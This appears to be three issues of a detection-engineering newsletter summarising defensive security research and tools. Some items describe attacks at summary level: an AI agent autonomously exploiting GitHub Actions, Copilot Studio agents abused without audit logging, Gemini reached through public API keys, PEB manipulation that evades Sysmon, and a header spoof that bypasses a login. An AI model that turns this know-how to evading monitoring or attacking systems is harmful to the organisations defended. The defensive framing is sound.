
Received today — 12 March 2026 Detection Engineering Weekly

DEW #148 - Detection Pipeline Maturity, GenUI for Log Analysis and Hunting Kali in Splunk

11 March 2026 at 13:03

Welcome to Issue #148 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

  • I have some exciting news! In about a week, you’ll see some new branding for Detection Engineering Weekly. This will be the second brand uplift of the newsletter, and I can’t wait to don the new colors and logo. It’s more professional and understated, and it captures much of the energy of what I think this newsletter brings to your inboxes. I’ll be handing out stickers and potentially some t-shirts at BSidesSF in a few weeks!

  • Speaking of BSidesSF, I’m interested in how many of you are going to be there. I am organizing a happy hour and doing a sticker order, so please vote Yes here, ping me, or honestly just find me in the hallway (I’ll be shilling the newsletter with t-shirts) and say hello!

Sponsor: Spectrum Security

Detection is Broken.

Measuring coverage means wrangling spreadsheets, BAS tools, and weeks of manual work. By the time you finish, the data is out of date.

But finding blind spots is only half the battle. There’s never enough time to close them. You’re on an endless treadmill: writing new rules, fixing broken ones, and tuning out noise.

We built the end of the manual grind.

Get an early look at the AI platform transforming how teams identify, build, & deploy detections

Try It Now


Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

💎 Detection Engineering Gem 💎

Detection Pipeline Maturity Model by Scott Plastine

I’m a huge fan of maturity models, and in the early days of my writing, I frequently referenced the work of Haider Dost and Kyle Bailey when discussing the maturity of detection engineering programs. As this space matured, technology matured with it, and we now have complex systems within each part of the Detection Engineering Lifecycle. So, to me, it makes sense that we now have folks like Plastine helping us understand what it means to measure the maturity of a Detection Pipeline.

Plastine outlines six different levels of maturity, starting with a classic favorite: no maturity! This involves having a security tool stack with no centralization, where analysts have dozens to hundreds of Google Chrome tabs open (which gives me anxiety). The fundamental issues Plastine outlines here, and progressively addresses at higher levels, include:

  • Several security tools with their own alerting and detection systems

  • The need to log into each individual tool to investigate each alert, creating screen sprawl

  • The analyst manually building cases in some case management or ticketing tool, such as JIRA or ServiceNow

The next maturity step, Basic, addresses some of these issues by essentially placing the Case Management tool between the tools and the analyst, rather than being out of band. As maturity levels progress, so does the architecture of this setup. For example, the “Standard+” architecture has a much saner pipeline setup:

The cool part at this point in the maturity journey is switching from architecture improvements to more advanced concepts in the analytics platform. Custom telemetry, log normalization, and a risk-based alerting engine ideally surface only relevant alerts and reduce false positives. Teams begin to build composite rules, leveraging commercial detections alongside their own internal detection and risk alerting systems, and they all take advantage of learning from their data to inform their rule sets, not just their environment.

This diagram drove it home for me, and became my favorite:

As you progress through maturity, the trap teams fall into is believing that more rules is better. I think the measure of a Leading detection function is reducing rule count, and with it the complexity of managing rule sprawl.

Plastine posits that this can be achieved by using data-science-based rules, risk-based detection, and leveraging as much entity-based correlation as possible.


🔬 State of the Art

Whose endpoint is this… kali?! by Alex Teixeira

I love reading Alex’s detection and hunting blogs because he always stuffs a ton of knowledge around query optimization and hunting. When you manage massive amounts of data in a SIEM, especially Splunk, you need to query it in a way that doesn’t cause a ton of load on the system. This is especially helpful when you are researching new detection rules.

In this post, Alex addresses query optimization and discovery for post-exploitation tools. I typically see a lot of teams worry, for good reason, about malware used in the beginning stages of a breach. Alex references loaders in this scenario: malware designed as an initial beachhead for infection, which is then upgraded into a more reliable malware tool. Cobalt Strike is a leading example, but there are hundreds at this point.

Post-exploitation tools are aptly named to help threat actors navigate the MITRE ATT&CK chain toward a specific objective, such as data exfiltration or ransomware. Persistence, lateral movement, and privilege escalation are all built into these types of tools. So if you assume these exist, how do you catch them?

From Alex’s Prioritizing a Detection Backlog post https://detect.fyi/how-to-prioritize-a-detection-backlog-84a16d4cc7ae

His strategy is to “reduce the dataset” as you are hunting. Instead of performing blind searches over logs, you can first focus on terms within the index and the Windows sourcetype itself. So, he begins his hunt looking for the term kali in Windows Event Logs. This is because these tools can leak their internal hostnames, and finding kali in the hostname with some threat activity is a great hunting lead.

Through a combination of hostname detection and observing a network event with the same name, he narrows the dataset to a meaningful set of events to respond to an infection and write rules for afterward.
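Alex works in Splunk’s SPL, which isn’t reproduced here; as a rough illustration of the same “reduce the dataset” idea, here’s a sketch in plain Python over already-parsed event records. The field names (raw, workstation_name, event_type, hostname) are hypothetical stand-ins for whatever your log schema uses.

```python
def hunt_leaked_hostnames(events, needle="kali"):
    # Pass 1: cheap term filter over the raw record, mimicking a term
    # search over the index before any field extraction
    candidates = [e for e in events if needle in e.get("raw", "").lower()]

    # Pass 2: keep candidates where the term appears in a hostname-like
    # field -- the "leaked internal hostname" signal
    leads = [e for e in candidates
             if needle in e.get("workstation_name", "").lower()]

    # Pass 3: correlate with network events referencing the same name,
    # narrowing the dataset to something worth responding to
    names = {e["workstation_name"].lower() for e in leads}
    correlated = [e for e in events
                  if e.get("event_type") == "network"
                  and e.get("hostname", "").lower() in names]
    return leads, correlated
```

The point is the ordering: each pass is cheaper than the next, so the expensive correlation only ever runs over a tiny slice of the data.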


Tracking DPRK operator IPs over time by Kieran Miyamoto

Threat research is such a fun, dynamic field within security because it examines both the technical and human elements of threat actors. This post is Miyamoto's “Part 3” on tracking DPRK threat actors via OPSEC failures, and it’s brilliant in its simplicity. Basically, FAMOUS CHOLLIMA, which has Contagious Interview and some WageMole overlaps, uses email to maintain its personas, register accounts, and issue fake employment-scam communications. The technical elements of this are interesting because they try to deploy malware on victim machines or obtain legitimate jobs as fake IT workers.

The human element of this operation is that humans tend to optimize for reducing the time it takes to do their job as efficiently as possible. So, why would you go through a ton of work to get legitimate email inboxes like Gmail or Yahoo if you only need the email address to send scam messages or register an npm account to publish malware? Miyamoto found that this group had the same question, and answered it by using temporary email addresses.

The subsequent finding is that, as long as you know the email address, you can also view the inbox! Miyamoto started with malicious npm packages containing maintainer emails and began logging into DPRK-controlled temporary email accounts to glean additional intelligence, including source IP addresses and potential victim targets.


From GenAI to GenUI: Why Your AI CTI Agent Is Sh*T by Thomas Roccia

TIL there’s a concept called Generative UI, where agents decide how to render the UI in real time based on your queries. In this post, Roccia uses this concept to build out use cases for cyber threat intelligence analysis. The idea here is that visually representing threat intelligence can help a researcher understand the underlying data much better than blobs of text. Roccia argues that most CTI Agents focus on ingesting unstructured threat intelligence and producing large volumes of output tailored to your environment or prompt. This setup can be helpful to some, but adding a visual component to aid your understanding makes it more attractive.

Roccia outlines two GenUI styles: MCPUI and A2UI. Both focus on delivering a graphical representation of a prompt response. MCPUI returns dynamic elements from an MCP server in response to a prompt, but it’s mostly contained within a UI that the developer creates. A2UI takes it a step further by delivering the entire UI experience in a container, making the agent the arbiter of the experience.

Roccia’s A2UI implementation was more interesting to me from a detection standpoint because he built a log analyzer on top of a log stream. Each element is supposedly dynamic, and you can click into and investigate logs while letting the A2UI protocol do its thing and present data and experiences to you, all driven by an agent. Here’s a demo video from his blog:

Wild times!


How we built high speed threat hunting for email security by Hugh Oh

I love it when security product companies show how they’ve engineered their product. In this post, Oh reveals how Sublime Security designed its massive email-detection and threat-hunting architecture. Their platform is built on MQL, their domain-specific language for rule writing and alerting. When you think about email as a telemetry source, there are some inherent issues to worry about that other sources don’t have:

  • Unstructured body content, since, by design, it is human-generated and human-readable

  • In Internet standards, email is a pretty ancient concept, so additional designs and RFCs were layered on top of it for decades, which can introduce some sharp edges

  • Attachments, integrations and user-experience elements are a huge vector for abuse, so you need to be able to parse those

Parsing all of this at scale is both a security problem and an engineering problem.

https://sublime.security/blog/how-we-built-high-speed-threat-hunting-for-email-security/

The Sublime product parses incoming emails into EML format and stores metadata in fast storage and the full contents in blob storage. They split email selection into several phases. Candidate selection focuses on fast metadata lookups; evaluation performs a deeper analysis to determine whether these candidates are truly worth a blob storage query; and, when the full email is retrieved, they can perform enrichments and ultimately decide whether to generate a result.
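The phased design can be sketched roughly like this, with dicts standing in for the real storage layers and hypothetical predicate names; Sublime’s actual implementation surely differs.

```python
def phased_hunt(metadata_rows, blob_store, select, evaluate, decide):
    # Phase 1: candidate selection -- fast metadata-only lookups
    candidates = [m for m in metadata_rows if select(m)]
    # Phase 2: evaluation -- deeper analysis that decides whether a
    # candidate is truly worth the (expensive) blob storage query
    worth_fetching = [m for m in candidates if evaluate(m)]
    # Phase 3: retrieval -- fetch the full EML, enrich, and decide
    # whether to emit a result
    results = []
    for meta in worth_fetching:
        eml = blob_store[meta["message_id"]]
        if decide(meta, eml):
            results.append(meta["message_id"])
    return results
```

The design choice worth noticing is that each phase is a filter on the previous one, so the cost of the blob fetch is amortized down to only the candidates that survive two rounds of cheap checks.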


A Practical Blue Team Project: SSH Log Analysis with Python by Edson Encinas

This is a great introductory post on researching a singular log source, SSH authentication logs, and building a research plan to implement detection rules. I think sometimes people breaking into this industry want to jump right into a SIEM and write rules, which can take time, energy, and potentially cost a lot to set up, whereas in this post, Encinas leveraged Python. It’s a good learning exercise: you can see where Python excels at detection, especially in a risk-based alerting scenario.

The architecture for the SSH alerting pipeline includes parsing, normalization, rule writing, risk calculation, and de-duplication. Their GitHub project was pretty easy to follow alongside the blog. Again, demonstrating these concepts in pure Python can accelerate understanding more than setting up massive environments.
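As a flavor of the approach (not Encinas’s actual code), here’s a toy version of that parse → normalize → score → de-duplicate pipeline; the regex and scoring weights are my own guesses.

```python
import re
from collections import defaultdict

# Hypothetical sshd "Failed password" pattern; real log lines vary by distro
FAILED = re.compile(
    r"Failed password for (invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

def score_failed_logins(lines, threshold=5):
    risk = defaultdict(int)
    for line in lines:
        m = FAILED.search(line)
        if not m:
            continue  # normalization step: ignore non-auth lines
        # risk calculation: failures against nonexistent users score higher
        risk[m.group("ip")] += 2 if m.group(1) else 1
    # de-duplication: one aggregated alert per source IP, above threshold
    return {ip: score for ip, score in risk.items() if score >= threshold}
```

A risk threshold per source IP is what turns a pile of individual failures into one actionable alert, which is the risk-based-alerting idea in miniature.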


☣️ Threat Landscape

I’m glad to see more individual interviews from Ryan on the Three Buddy Problem podcast! In this “Security Conversations” segment, Ryan interviews threat-hunting and intelligence expert Greg Linares. Greg has all kinds of visibility working at an MDR and recently released a year-in-review report on some of the intrusions Huntress is seeing.

The most interesting sections for me were around the intersection of ransomware and nation-state threat actors, as well as the use of RMM tools and the complete lack of audit logging and visibility they provide defenders. Imagine onboarding any other critical IT tool, such as an Enterprise Email provider or a Cloud tool, and being told there will be little to no telemetry available to help you defend the application against a compromise. That’s RMM in a nutshell!


Investigating Suspected DPRK-Linked Crypto Intrusions by CTRL-Alt-Intel

I talk a lot about DPRK-related threat activity in this newsletter for several reasons. One, DPRK tends to focus on cloud technologies, and IMHO, they were way ahead of their nation-state peers. Two, they are just so damn crafty and are willing to move fast and break things. Three, because of point two, they have a ton of OPSEC failures that lead to some hilarious findings.

In this post, CTRL-Alt-Intel follows an intrusion by a DPRK actor who began with an Application exploit a la React2Shell, found AWS credentials, pivoted to AWS, and ultimately stole source code. The author says this focus was mostly on cryptocurrency companies, so if we believe this intrusion targeted one of those organizations, then the intelligence value for them would be discovering secrets and vulnerabilities in proprietary code for further attacks.


Uncovering agent logging gaps in Copilot Studio by Katie Knowles

~ Note, Datadog is my employer and Katie is my colleague / friend! ~

Microsoft Copilot Studio is Microsoft’s offering for creating and managing AI agents. During Katie’s previous research on how to abuse Copilot Studio for OAuth phishing, she found that Copilot wasn’t logging certain administrative actions. This is especially concerning if you rely on audit logs for threat detection. A victim agent could be abused to retrieve sensitive information from your organization and you’d have no visibility into the attack itself.

Katie provides excellent security recommendations towards the end, including identifying which M365 users are using Copilot, and what searches and rules you could write to detect anomalous activity in Copilot.


This was a fun read for those who are interested in phishing-related threat research. Ceukelaire got a phishing text message, accessed the phishing page, and began poking holes in it. He found a vulnerability where setting the X-Forwarded-For header to a localhost address (Substack won’t let me publish it?) automatically bypassed the administrator login panel.
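The kit’s source isn’t published, so this is only a guess at the class of bug being described: an admin check that trusts the fully attacker-controlled X-Forwarded-For header.

```python
def is_admin_request(headers):
    # VULNERABLE: any client can simply send X-Forwarded-For: 127.0.0.1,
    # so a "localhost only" admin panel check based on it is spoofable
    client_ip = headers.get("X-Forwarded-For", "")
    return client_ip.startswith("127.")
```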

From there, he started rendering the kit useless by removing its functionality and its ability to communicate with a Telegram-controlled channel. He was able to stop victim exfiltration and prevent further victims from visiting the website. Luckily, it was a poorly designed phishing kit, riddled with vulnerabilities, but not all kits are this insecure.


Clearing the Water: Unmasking an Attack Chain of MuddyWater by Harlan Carvey and Jamie Levy

In this post, Huntress researchers Carvey and Levy detailed findings related to what appears to be a hands-on-keyboard MuddyWater campaign targeting one of their customers. They first found intelligence from a Hunt.io report and worked backwards into their own customer reports. Some interesting findings they made include:

  • Typos in the terminal commands MuddyWater ran, indicating an actor who was typing in real time during the intrusion

  • Tradecraft learnings, such as opening PowerShell from Explorer, making it seem like more legitimate activity than running it from the command line

  • Troubleshooting in real time by cURLing ifconfig.me to make sure they had Internet connectivity

It turns out that threat actors make mistakes too!


🔗 Open Source

killvxk/awesome-C2

Yet another awesome-* list of 300+ Command and Control frameworks. This is a fun list if you want to test adversary simulation in a lab environment, or statically analyze the post-exploitation code for detection opportunities.


edsonencinas/log-analyzer

Encinas’s pure Python “SIEM” used in his SSH log analyzer blog post listed above in the State of the Art section. What’s nice about this is that it reduces the complexity of standing up an environment, so you can instead focus on the concepts of detection in a contained programming language.


github/spec-kit

Not really detection related, but this was something my colleague Matt Muller sent me as I was vibe-coding a fully STIXv2-compliant Threat Intelligence Platform. Spec Kit is a framework for spec-driven development using agents. You create a constitution that sets guidelines for development principles, specify what you want to build, plan how to build it with certain technologies, build a task list, and then have the agent go to work.

I kept my speckit separate from my code, so my agent would read and update my local spec and then go into the target project directory for development.


m1k1o/neko

Self-hosted virtual browser using containers and WebRTC. These technologies are always super interesting from an OPSEC perspective, because you can literally embed a browser in a website you host alongside neko. This makes it easy to build non-attributable, disposable infrastructure for things like threat intelligence research or for interacting with threat actor infrastructure.


anotherhadi/default-creds

Open-source database of default credentials across 100s of manufacturers. You can download this and take the credentials yourself, or run their self-contained web application, or just visit the hosted web application and find some hilarious default creds.


DEW #147 - Flying Blind with your Logs, MAD lads and Z-scores & How Reddit Does Threat Detection

4 March 2026 at 14:04


Welcome to Issue #147 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

  • Sickness in the Allen household was rampant all last week until today. Fingers crossed that the family stays healthy because there is FINALLY some good weather in New England to look forward to

  • I recently bought a history book about the Marquis de Lafayette. It’s been so nice to get away from technical books and even fantasy to enjoy some history. This guy was a baller and essentially helped overthrow two governments and turn them into democracies

  • BSidesSF is getting closer and I’m getting more and more excited to enjoy a security conference and network. There’s a chance I’ll be bringing stickers :D

Sponsor: Cotool

Cotool Research: Benchmarking LLMs for Defensive Security

Most AI benchmarks skew toward offense, so we built our own grounded in real SecOps workflows to answer questions that matter in production:

  • Which model should power your triage agent?

  • What architectures hold up in complex investigations?

We believe those answers should be public, so we release every benchmark we create.

Explore the benchmarks


💎 Detection Engineering Gem 💎

You’re Probably Flying Blind by Lydia Graslie

The bane and boon of Cloud or SaaS technology is that it is managed by someone else. This business model has enabled some of the biggest businesses in the world to focus on their core business, rather than building and maintaining bespoke software or procuring software that they must manage internally. “The olden days” involved running your own e-mail servers, databases, and Active Directory servers (though many folks still do this today). The problem, though, is that because it’s managed by someone else, you are at the whim of how they change the software, and the “managed” part becomes an operational risk if you don’t like that change.

Don’t worry, it gets worse for security teams. And Graslie’s blog helps frame this issue around security operations and detection rules. I’m glad she’s using Microsoft products as a grounding element for these issues because 1) they are fun to pick on and 2) they deserve every criticism due to their history of notorious licensing and product changes that leave detection engineers “flying blind”.

Graslie lists out four intertwined issues with relying on SaaS and Cloud technologies for detection efficacy and here they are in my own words:

  1. Detection availability and observability. Unlike a machine in your local network that you can walk over to and physically touch, you have to have awareness of the SaaS & cloud technologies, licenses and services that are in use. You have to hope that these products are functioning and sending the right logs and that there aren’t outages or delays in delivery

  2. Multiple attack paths to the same outcome. Akin to how many Windows-based attacks leverage intermediary or middleware APIs to evade detection on certain attack paths, Cloud and SaaS attacks operate similarly. In fact, in many ways, these platforms are their own operating systems, and achieving lateral movement or privilege escalation can happen in more than one way. Here’s a Mermaid Diagram I had Claude generate to demonstrate Graslie’s example of “same action, different telemetry paths” in this section:

     In this Azure example, Graslie explains how authenticating to a single cloud resource can take these four paths. An interactive user seems like a logical detection path, but the other three do the same thing, and the authenticating identity type, the logs, and the schema are all different.

  3. Shifting attack surfaces, new and deprecated features, and pricing are a detection nightmare. She lists out an absolutely ridiculous timeline of Microsoft releasing “at least seven Microsoft PowerShell modules and protocols for managing identity”. That’s seven different API collections you need to account for to keep Issue 2 from becoming a blind spot.

  4. Similar to 3, the detection and observability surface shifts. A good example of this is when a field or value format changes in a log source you are writing detections over. This happens all the time with audit logs from SaaS vendors. New subproducts can force vendors to change field names or add new values that you’ve never seen before.

Each one of these issues is “intertwined.” Graslie gives several examples of how they can compound in certain scenarios. For example, how can you understand your attack surface if you don’t have telemetry, or even worse, you aren’t even aware that a SaaS app exists in your environment? She concludes the post with a teaser for a series that examines each of these four issues, all grounded in Microsoft environments.


🔬 State of the Art

The Detection Engineering Baseline: Statistical Methods (Part 2) by Brandon Lyons

This is Brandon’s Part 2 of his “Detection Engineering Baseline” series, with a more practical application of the data he generated in Part 1. The key skill here is distribution mapping, typically covered in statistics classes as the normal distribution, or the Bell curve. I believe a lot of SOC analysts and detection engineers perform many of the techniques Lyons describes here without knowing it. For example, grouping by a field and then sorting from lowest → highest surfaces “rare events”. Another example Lyons calls out is filtering out the noisiest offenders, such as service accounts, to remove 80% of the volume so you can hunt through the remaining 20%, a la the Pareto Principle.

I especially appreciated the commentary on the distribution of security data in general, as illustrated here:

Unlike a normal Bell Curve, security data tends to have a long tail, according to Lyons. This makes baselining harder because you need to account for noisiness on both ends of the distribution in different ways. Lyons astutely points out that this is why typical mean and standard deviation calculations fall short of generating meaningful alerts here: a single shift in traffic, or a misconfiguration that throws off a ton of alerts, can completely screw up detection.

He then continues this analysis using Median Absolute Deviation (MAD) & modified Z-score, as explained in the first post, which helps maintain robustness in the case of wild value swings. The computation of MAD helps capture the position of a new value relative to a set of numbers, rather than its magnitude as it swings to either end of a distribution.

I took his example and wrote it out myself (with Claude helping with formatting) so I could understand it better:

What makes this robust, or resilient, is that you may get a swing in Daily Counts (Line 5), much like the 620 value, but it doesn’t skew the baseline, because you are anchoring on the median rather than the mean.
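To convince myself of the robustness claim, here’s a minimal worked version of the math, using the common 0.6745 scaling constant (Lyons’ original example table isn’t reproduced here):

```python
from statistics import median

def modified_z_score(value, history):
    # MAD = median of absolute deviations from the median; because both
    # steps use medians, a single wild outlier barely moves the baseline
    med = median(history)
    mad = median(abs(x - med) for x in history)
    if mad == 0:
        return 0.0  # degenerate case: all history values identical
    return 0.6745 * (value - med) / mad
```

With a history like [100, 102, 98, 101, 99, 620], the 620 spike scores enormously above the usual 3.5 cutoff, while a normal day like 101 stays near zero, even though the spike itself sits in the history.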

Once you get the hang of this, there are still ways to slice and dice your data to get a representative sample. Lyons calls out entities as an option, or cohorting, which lets you reconcile traffic or behavior down to individual users, service accounts, or services themselves. These “context dimensions” are important because they only really work in your environment, and your team should know the context for baselining better than any other security product.


How Reddit Does Threat Detection by Austin Jackson

I love reading posts describing how organizations design and execute their Security Operations programs. In this post, Reddit Staff Engineer Austin Jackson describes the company’s philosophy and technology stack around threat detection. It’s a continuation of their rip-and-replace-Splunk post, which I need to check out, perhaps for another issue. Basically, the team moved to a Data Lake approach using BigQuery, and they run Apache Airflow for detection rules and alerting. There are some neat detection-as-code tricks here, and because the system is a lot more decoupled than a massive Splunk stack, they’ve gained a few advantages.

First, all of their detections are written in a simple YAML format. The Airflow runner kicks off on cron jobs and runs queries over BigQuery to generate alerts. Once an alert fires, they send results to Tines for additional orchestration and enrichment. Jackson had a special callout about sliding-window detections and avoiding missed telemetry. In a recent newsletter issue, I covered a post in which a researcher leveraged watermarking to address SaaS export gaps, and the same concept applies here, with the watermark kept in a separate table. The detection engineer appends a clause to the end of their query that uses the watermark timestamp to prevent telemetry loss.
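The watermark trick can be sketched like this; the field and function names are made up, and the real pipeline runs inside Airflow against BigQuery:

```python
def watermarked_query(rule_sql, watermark_ts):
    # The clause the detection engineer appends so the sliding window
    # starts at the last high-water mark rather than a fixed lookback
    return f"{rule_sql} AND event_time > TIMESTAMP('{watermark_ts}')"

def advance_watermark(events, current_ts):
    # Advance to the max event time actually observed, not wall-clock
    # "now" -- late-arriving telemetry is then caught by the next run
    return max([current_ts] + [e["event_time"] for e in events])
```

The subtle part is `advance_watermark`: if the watermark moved with the clock instead of the data, any telemetry delivered late would fall permanently between two windows.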

Jackson finishes the post detailing their scoring workflows in Tines, and I thought the most unique part of this section was the AI Triage component. Rather than trying to run a singular agent across all of their telemetry, detection engineers can ship a prompt inside the rule for Tines to run over it for additional enrichment, analysis and scoring.

r/RedditEng - Figure 2: The O11y Action System – scoring, suppression, and alert routing.

AWS Incident Response: IAM Containment That Survives Eventual Consistency by Eduard Agavriloae

Eventual consistency is a pattern in large-scale systems, like the AWS cloud, where a change in state isn’t instantaneous, and it will take time for the state to be replicated across all of the systems you are working with. This makes sense: imagine a massive AWS account with several sub-accounts and regions, and you need to push a change out to configurations or identity permissions. You should expect the change to take effect after you issue your configuration changes, but you may not know that it takes time for these changes to propagate.

In AWS security incident response, you may have to deal with this as you follow standard playbooks to isolate accounts or principals. According to Agavriloae, this eventual consistency pattern creates an opportunity for attackers to recognize that an isolation is in progress and, if they have the right permissions, revert the change before the state is locked in. AWS IAM is very hard to reason about because multiple escalation paths can lead to the same outcome, so mechanisms meant to guarantee isolation can miss certain attack paths.

Agavriloae provides a solution to this eventual consistency problem by leveraging Service Control Policies at the organizational level, where only break-glass IR roles can remove the quarantine policy.
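As a rough guess at the shape of such a quarantine policy (expressed here as a Python dict for readability; the tag key, role name, and condition operators are illustrative, not taken from the post):

```python
QUARANTINE_SCP = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyAllForQuarantinedPrincipals",
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {
            # Applies only to principals an IR responder has tagged
            "StringEquals": {"aws:PrincipalTag/quarantine": "true"},
            # ...while never locking out the break-glass IR role itself
            "ArnNotLike": {
                "aws:PrincipalArn": "arn:aws:iam::*:role/IR-BreakGlass"
            },
        },
    }],
}
```

Because the policy is attached at the organization level, a compromised principal inside the member account has no path to detach it, which is what defeats the eventual-consistency race.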


👊 Quick Hits

Cyber Threat Intelligence Framework by CERT EU

I’ve always found it fascinating how CERT teams, especially those that protect countries or allies, publish their internal processes and frameworks for citizens to study. In this framework by CERT EU, they introduce the concepts of Malicious Activities of Interest (MAIs) and Ecosystems. MAIs, to me, read like “observables” in the STIX context. I think the more unique introduction, though, is the concept of Ecosystems. We tend to have CTI teams that look at the breadth of attacks against their organizations, and it’s easy for them to determine whether they were targeted.

Ecosystems, according to CERT EU, rely on the victimology or targeting set of an MAI. It’s almost like a self-organized ISAC for all of their constituencies. Because the EU is more than just one country, CERT EU can specifically dive into how MAIs target not only Member States, but also things like Sectors, Events, and much more.


AWS Threat Detection with Stratus RedTeam Series — MITRE ATT&CK Style — Execution (Part 1) by Soumyanil Biswas

This is a great “detection lab” post that leverages my colleague Christophe Tafani-Dereeper’s Stratus Red Team tool for threat emulation and detection validation in AWS. Biswas helps readers set up an AWS environment, configure Stratus Red Team, configure data sources (CloudTrail), and eventually write a SQL and a Sigma rule to catch each attack.


☣️ Threat Landscape

hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions - Microsoft, DataDog, and CNCF Projects Hit So Far by Varun Sharma

The Step Security team found an OpenClaw security research agent actively trying to exploit CI/CD pipelines for popular open-source projects. OpenClaw is “fully autonomous”: it performs heartbeat checks every few hours and follows a prompt to perform an action. The bot’s instructions were hosted on GitHub, and Sharma managed to get a snapshot of them to perform an analysis, but they have since been taken down. Here is the Step Security team’s explanation of the attack workflow:


Who is the Kimwolf Botmaster “Dort”? by Brian Krebs

This is a follow-up post to Krebs’s exposé of the Kimwolf botnet, which detailed how a botmaster named Dort built and ran the botnet. A security researcher exposed the botnet by disclosing a vulnerability that enabled Dort to take control of poorly configured devices on proxy networks. This significantly dropped Kimwolf’s numbers, so Dort began harassing Krebs and the researcher.

In classic Krebs fashion, he doxxed Dort and found everything from his name and former monikers to a computer he shared with his mother. Towards the end of the article, Krebs gets on the phone with the alleged “Dort”, and the person on the phone denied any involvement and claimed their identity was impersonated.


Google API Keys Weren't Secrets. But then Gemini Changed the Rules. by Joe Leon

Google API Keys are provided to developers who want to embed certain Google products on their websites or in their applications. Google explicitly says these API keys are not secret, and it makes sense that they are not, because you typically see them in embedded Google Maps on sites. This changed with Google’s release of Gemini. The research team at Truffle Security discovered that you can leverage publicly facing API keys embedded in these applications to access Gemini functionality. This includes accessing private datasets or LLM-jacking Gemini itself for whatever purpose you want.


Hook, line, and vault: A technical deep dive into the 1Phish kit by Martin McCloskey

~ Note, I work at Datadog and Martin is my colleague ~

Modern-day theft of secrets, passwords, and sessions typically relies on infostealer malware. It’s a quick way to infect a user, pilfer their environment, and extract credentials as fast as possible. It presupposes that these secrets exist on their laptop, and IMHO, it’s a subset of everything the victim has in their digital identity. If I were ever infected by one of these, I would be worried about my credentials, but I think I could rotate local secrets pretty quickly. But if someone got my 1Password account, it would be SO much more painful to reroll everything.

Martin discovered a 1Password phishing kit that targets users of the password manager. It evolved over his analysis timeline, graduating from a simple password stealer to one that leverages AiTM-style features, fingerprints browsers and researchers, and targets specific geographic regions.


🔗 Open Source

sublime-security/ics-phishing-toolkit

Friends of the newsletter, Sublime Security, just released a phishing analysis toolkit to detect and respond to ICS Calendar phishing. It has integrations with Mimecast, Proofpoint, Google Workspace, M365 & Abnormal Security. The tool reviews emails with calendar invites across the different integrations and quarantines any that match ICS Phishing heuristics.
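The post doesn’t publish the toolkit’s internals, but the general shape of an ICS phishing heuristic is easy to sketch. The following is a hypothetical, simplified example, assuming a rule like “organizer domain doesn’t match the sender and the invite embeds a URL”; the field parsing and function name are mine, not Sublime Security’s.

```python
import re

def looks_like_ics_phish(ics_text: str, sender_domain: str) -> bool:
    """Flag a calendar invite whose ORGANIZER domain doesn't match the
    sender's domain and whose body embeds a URL. Illustrative only."""
    organizer = re.search(r"ORGANIZER.*?:mailto:[^@\s]+@([\w.-]+)", ics_text, re.I)
    has_url = re.search(r"https?://", ics_text, re.I)
    if organizer is None:
        return False
    return organizer.group(1).lower() != sender_domain.lower() and bool(has_url)

invite = (
    "BEGIN:VCALENDAR\n"
    "ORGANIZER;CN=IT Support:mailto:helpdesk@evil.example\n"
    "DESCRIPTION:Re-verify your mailbox: https://evil.example/login\n"
    "END:VCALENDAR\n"
)
print(looks_like_ics_phish(invite, "corp.example"))  # → True
```

A real toolkit layers many such heuristics and only quarantines on aggregate confidence, but the organizer/sender mismatch is the classic tell.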


advaitpatel/DockSec

DockSec is an open-source Docker container vulnerability scanner. It combines several open-source tools to support vulnerability analysis and enrichment, then leverages AI to suggest remediation steps and generate reports.


Cloudgeni-ai/infrastructure-agents-guide

This is a comprehensive guide for infrastructure teams on how to securely build and implement AI Agents. It has 13 chapters in total and covers a range of topics, including sandboxing, version control, and observability.


knostic/OpenAnt

OpenAnt is an open-source LLM-based vulnerability scanner. It reminds me a bit of OpenAI’s Aardvark, but with a lot more open architecture for you to review and implement. It can run up to 6 stages for any vulnerability it finds, which is nice because it’s orchestrated to reduce cost and only spend time on a vulnerability if it’s legit.


DEW #146 - The logs are lying, my latest post on Agentic Security & re-tooling security for speed

25 February 2026 at 13:46

Welcome to Issue #146 of Detection Engineering Weekly!

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

✍️ Musings from the life of Zack:

  • New England has been a rough place to live, weather-wise, since the holidays. My family finally managed to get out of the house and into the snowy White Mountains in New Hampshire. I instantly felt relaxed as soon as we started the drive. I can’t touch grass right now, so I guess snow will do!

  • For those with small children: hope you are all doing OK with sickness these last few months. We are hanging in there, but it’s been one thing after another :)

  • My org at Datadog is hiring like crazy! Check these posts out and apply if it seems interesting to y’all!

Sponsor: Push Security

Has the news of malicious browser extension attacks got you on edge?


Malicious browser extensions have been one of the top attack vectors of 2026 so far. All an attacker has to do is phish a developer, or simply offer to buy their extension — and they’ve compromised millions of users.

Join the latest webinar from Push Security for a teardown of malicious browser extensions, where you’ll learn how attackers are distributing extensions via legitimate channels, what makes an extension malicious or high-risk, and what you can do to secure your organization.

Register Now


💎 Detection Engineering Gem 💎

How reliable are the logs? by Birkan Kess

Detection and telemetry observability is a concept I rarely see discussed, because it may not be part of a detection engineer’s day-to-day work. The basic premise behind detection is that *there is no detection without telemetry.* A surface-level example: you won’t be able to detect malware process creation on Windows without telemetry that generates a log around process creation. It’s an easy binary decision: my rules won’t fire if they don’t see anything. This post by Kess dives deeper into this concept, arguing that we need to be critical of what the telemetry records and where it records it. He asks the question, “Should we even trust these logs?”

An example of this concept, according to Kess, is comparing telemetry sources for Process Creation. He outlines 3 sources:

The data structure associated with Process Creation monitoring is called the Process Environment Block, or PEB. It stores all kinds of useful data for detection creation, so we can understand the context around process creation. The key point from Kess’ research is that this information is surfaced from Kernel mode to User mode and could be manipulated.

This manipulation relies on the time at which the telemetry is observed. As soon as the PEB metadata surfaces in a user-mode context, it can be hooked and modified to evade defenses. I thought this block was useful to understand the timing problem:

Kess then lists several examples from a lab test. The first test manipulates the PEB via the CommandLine entry in the PEB data structure. The second shows how Sysmon recorded a benign certutil command, while without kernel ETW tracing you couldn’t see the PEB manipulation that pulled a malicious payload from a C2 server.
